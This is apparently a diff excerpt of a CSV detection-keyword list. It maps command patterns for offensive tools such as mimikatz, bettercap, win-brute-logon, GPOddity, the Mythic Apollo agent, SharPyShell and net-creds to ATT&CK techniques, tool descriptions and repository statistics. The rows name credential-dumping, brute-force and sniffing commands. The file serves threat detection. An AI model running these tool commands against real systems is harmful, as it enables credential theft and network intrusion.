users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*net user john H4x00r123*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" -"*net.fuzz *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net.fuzz.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net.probe on","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net.probe on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net.sniff *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net.sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net::alias*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::deleg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::group*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::if*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::serverinfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::session*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::share*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::stats*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::tod*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::user*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*net::wsession*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net user HackMe *","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*net user john H4x00r123*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" +"*net.fuzz *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.fuzz.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.probe on","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.probe on*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.sniff *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net.sniff.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net::alias*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::deleg*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::group*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::if*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::serverinfo*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::session*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::share*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::stats*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::tod*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::user*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*net::wsession*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*net_dclist *","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*net_localgroup_member -Group*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" "*net_portscan.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" -"*net_recon.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" -"*net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","0","N/A","N/A","10","1560","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z" +"*net_recon.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*net-creds*","offensive_tool_keyword","net-creds","Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service 